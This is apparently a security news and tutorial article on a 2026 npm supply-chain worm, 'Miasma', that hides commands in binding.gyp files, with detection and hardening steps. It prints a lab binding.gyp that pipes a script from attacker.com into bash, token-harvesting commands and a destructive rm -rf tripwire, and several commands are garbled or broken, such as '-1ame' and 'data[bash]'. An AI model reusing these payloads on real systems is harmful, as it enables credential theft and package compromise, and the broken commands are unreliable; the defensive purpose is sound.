Shai-Hulud Rises Again: 23 npm Packages Infected in Devastating Supply Chain Attack—Are Your CI/CD Pipelines Next? + Video

By /

Listen to this Post

Featured Image

Introduction

A sophisticated new variant of the infamous Shai-Hulud malware, dubbed “Miasma,” has resurfaced in the npm ecosystem, compromising at least 23 packages through a developer account takeover. This latest iteration leverages a highly evasive technique known as “Phantom Gyp,” which abuses the normally benign `binding.gyp` file to trigger malicious code execution silently during npm install—bypassing traditional security controls that only scan `package.json` scripts. With over 320 infected repositories already identified on GitHub and a self-propagating worm that steals credentials, cloud secrets, and CI/CD tokens, this attack represents one of the most significant supply chain threats of 2026.

Learning Objectives

  • Understand the mechanics of the “Phantom Gyp” attack vector and how it evades conventional npm security defenses.
  • Identify indicators of compromise (IOCs) and learn how to detect malicious `binding.gyp` files and obfuscated payloads.
  • Implement defensive measures to harden CI/CD pipelines, rotate compromised credentials, and prevent worm propagation.
  1. The Phantom Gyp Technique: How Malware Hides in Plain Sight

The Miasma variant’s most dangerous innovation is its use of the `binding.gyp` file—a configuration file used by `node-gyp` to compile native Node.js add-ons. When a package contains a `binding.gyp` file and no custom `preinstall` or `install` scripts in package.json, npm automatically invokes `node-gyp rebuild` during installation. This process parses the `binding.gyp` file and can execute arbitrary shell commands via the `` syntax.

Attackers exploit this by embedding malicious commands directly into the `binding.gyp` file. The executed payload then downloads a Bun runtime, steals credentials, and exfiltrates data to a GitHub dead-drop repository. This technique is particularly insidious because most security tools and developer training focus on scrutinizing `package.json` lifecycle scripts, leaving `binding.gyp` largely unchecked.

Step‑by‑step guide to understanding and simulating the attack:

To fully grasp the attack chain, security professionals can simulate the “Phantom Gyp” technique in a controlled lab environment:

  1. Create a malicious `binding.gyp` file: The attacker creates a `binding.gyp` file in the package root with commands that execute during the build process. 
    {
"targets": [
{
"target_name": "evil",
"sources": [ "evil.c" ],
"conditions": [
["OS=='linux'", {
"cflags": [
"<!(curl -s http://attacker.com/payload.sh | bash)"
]
}]
]
}
]
}

  2. Trigger execution during npm install: When a victim runs npm install, `node-gyp rebuild` executes, and the command in the `cflags` directive runs the attacker’s payload.

  3. Payload deployment: The initial command often downloads a second-stage payload, such as a Bun runtime, to avoid detection.

    curl -fsSL https://bun.sh/install | bash

  4. Credential harvesting: The malware then uses the GitHub CLI to extract tokens and enumerate repositories.

    gh auth token

  5. Data exfiltration: Stolen credentials and environment variables are sent to an attacker-controlled GitHub repository via authenticated API requests.

Detection commands (Linux/macOS):

  • Scan for suspicious `binding.gyp` files containing command execution patterns: 
    find . -1ame "binding.gyp" -exec grep -l "<!(" {} \;
  • Monitor for unexpected `node-gyp` invocations or Bun runtime downloads in CI/CD logs: 
    grep -E "node-gyp|bun install|curl.bun" /var/log/syslog

2. Credential Harvesting and Worm Propagation

Once executed, the Miasma malware initiates a multi-stage credential theft and propagation routine. It systematically scans the compromised environment for GitHub access tokens, package registry authentication tokens, npm tokens, and cloud service credentials (AWS, GCP, Azure). The malware then validates these stolen credentials and enumerates accessible repositories and services.

Critically, the worm uses the stolen maintainer credentials to publish new malicious versions of legitimate packages. This self-propagating capability allows the attack to spread rapidly across the software supply chain, infecting downstream consumers and CI/CD pipelines. The malware also plants backdoor configurations inside AI coding assistant directories (e.g., Cursor, Copilot), ensuring persistence even after the malicious package is removed.

Step‑by‑step guide to detecting and mitigating credential theft:

  1. Audit GitHub and npm tokens: Immediately revoke any tokens that may have been exposed. 
    List GitHub tokens
gh auth status
Revoke a token (via GitHub UI or CLI)
gh auth logout

  2. Rotate cloud credentials: For AWS, GCP, and Azure, rotate all access keys and service principal credentials from a clean, isolated machine.

  3. Scan for unauthorized package publications: Check npm and GitHub for unexpected package versions published by your organization.

    List all versions of a package
npm view <package-1ame> versions --json

  4. Check for AI assistant backdoors: Inspect AI configuration directories for unauthorized modifications.

    Check Cursor IDE settings
cat ~/.cursor/settings.json | grep -i "backdoor|malicious"

  5. Monitor for `rm -rf ~/` tripwires: The worm contains a destructive tripwire that wipes the home directory if a decoy token is touched. Ensure endpoint detection and response (EDR) tools are monitoring for this command.

  6. The Compromised Packages and Scale of the Attack

The initial wave of the attack targeted 23 npm packages under the “leo” namespace, including [email protected], [email protected], [email protected], and various connector packages for MySQL, PostgreSQL, Elasticsearch, and MongoDB. The attackers used the GitHub repository description “Alright Lets See If This Works” as a marker, with over 320 infected repositories already identified.

However, this is just the tip of the iceberg. Subsequent waves have compromised over 281 malicious package versions across the npm ecosystem, including high-profile packages such as `@vapi-ai/server-sdk` (~408,000 monthly downloads) and `ai-sdk-ollama` (~120,000 monthly downloads). The campaign also affected 32 packages under the legitimate `@redhat-cloud-services` namespace, demonstrating that this is not a typosquatting attack but a direct compromise of trusted maintainer accounts.

Detection and response commands:

  • Check for affected packages in your `package-lock.json` or yarn.lock: 
    grep -E "leo-sdk|leo-cli|leo-auth|leo-connector|@vapi-ai|ai-sdk-ollama|autotel|awaitly" package-lock.json
  • Verify package integrity using npm audit: 
    npm audit --production
  • Use Snyk or Socket to scan for obfuscated payloads: 
    snyk test --all-projects

4. Evasive Execution and Obfuscation Techniques

The Miasma malware employs multiple layers of obfuscation to evade detection. The initial payload is heavily obfuscated using `eval()` and ROT-based decoding techniques. Sensitive strings are protected behind a bespoke encryption routine that derives keys using PBKDF2-HMAC-SHA-256 with 200,000 iterations, followed by multiple SHA-256-seeded permutation and XOR stages.

Furthermore, the malware generates a uniquely encrypted payload for each infection, using a changing AES-128-GCM key that is per-upload location on GitHub. This makes hash-based indicators of compromise (IOCs) useful only for a specific package version, significantly complicating detection and version tracking.

Step‑by‑step guide to analyzing obfuscated payloads:

  1. Extract the malicious `index.js` file: Locate the oversized root `index.js` file (often > 100KB) in the compromised package.

2. De-obfuscate using static analysis tools:

 Use a tool like js-beautify to format the code
js-beautify index.js > index-deobfuscated.js
  1. Identify XOR encryption loops: Search for common XOR patterns in the de-obfuscated code. 
    // Look for patterns like:
for (var i = 0; i < data.length; i++) {
data[bash] ^= key[i % key.length];
}

  2. Extract the AES key: Search for hardcoded or derived keys using PBKDF2.

    // Look for crypto.pbkdf2 or similar functions
crypto.pbkdf2(password, salt, 200000, 32, 'sha256', callback);

  3. Decrypt the payload: Use Node.js to replicate the decryption routine and extract the final payload.

5. Defensive Measures and Hardening Strategies

Organizations must adopt a multi-layered defense strategy to protect against the Miasma and similar supply chain attacks.

Immediate Actions:

  • Rotate all credentials from a clean machine before touching the compromised environment.
  • Remove affected packages and treat impacted environments as potentially compromised.
  • Revoke and rotate all npm, GitHub, AWS, GCP, and Azure tokens.

Long-term Hardening:

  • Disable `node-gyp` where possible or use `–ignore-scripts` flag during installation in high-risk environments. 
    npm install --ignore-scripts
  • Implement registry cooldown windows and verify SLSA provenance signatures to limit package tampering.
  • Scan for `binding.gyp` files containing command execution patterns in your CI/CD pipelines.
  • Use dependency scanning tools like Snyk, Socket, or Sonatype that detect obfuscated payloads and credential stealers.
  • Monitor for unexpected Bun runtime downloads, oversized root `index.js` files, and creation of new GitHub repositories by CI-issued tokens.

Windows-specific commands:

  • Use PowerShell to scan for malicious `binding.gyp` files: 
    Get-ChildItem -Recurse -Filter "binding.gyp" | Select-String "<!("
  • Check for unauthorized npm package versions: 
    npm view <package-1ame> versions --json

What Undercode Say:

  • Key Takeaway 1: The “Phantom Gyp” technique represents a paradigm shift in npm supply chain attacks, rendering traditional `package.json` script scanning obsolete. Security teams must expand their detection scope to include `binding.gyp` and other build-time configuration files.

  • Key Takeaway 2: The Miasma campaign validates a new threat model where compromised developer credentials are weaponized to propagate self-replicating worms across the software supply chain, with attackers now targeting cloud identities and AI coding assistants for persistent access.

Analysis:

This attack is not an isolated incident but part of a broader trend of sophisticated supply chain compromises targeting the npm ecosystem. The use of per-infection encryption and multiple obfuscation layers indicates a mature threat actor with significant resources. The pivot to targeting AI coding assistants is particularly concerning, as it allows the malware to persist even after the malicious package is removed. Organizations must adopt a zero-trust approach to their CI/CD pipelines, treating every `npm install` as a potential security boundary. The speed of the attack—over 286 malicious versions published in under two hours—underscores the need for automated, real-time threat detection and response capabilities.

Prediction:

  • -1 The Miasma attack will accelerate the adoption of software bill of materials (SBOM) and SLSA provenance requirements across the industry, but not before several more major supply chain incidents occur.
  • -1 Attackers will increasingly target AI coding assistant configuration files as a persistence mechanism, leading to a new class of “AI-assisted” supply chain attacks that are even harder to detect.
  • +1 The open-source community will respond by developing new tooling specifically designed to detect and block binding.gyp-based attacks, similar to how `npm audit` was developed in response to earlier supply chain threats.
  • -1 The underground market for developer credentials will continue to grow, with threat actors specializing in account takeover and credential resale, making developer accounts a primary attack vector.
  • +1 Organizations will implement more rigorous access controls and multi-factor authentication (MFA) for developer accounts, reducing the risk of account compromise—but this will take time to deploy across all ecosystems.

▶️ Related Video (76% Match):

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Hexploit Breaking – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: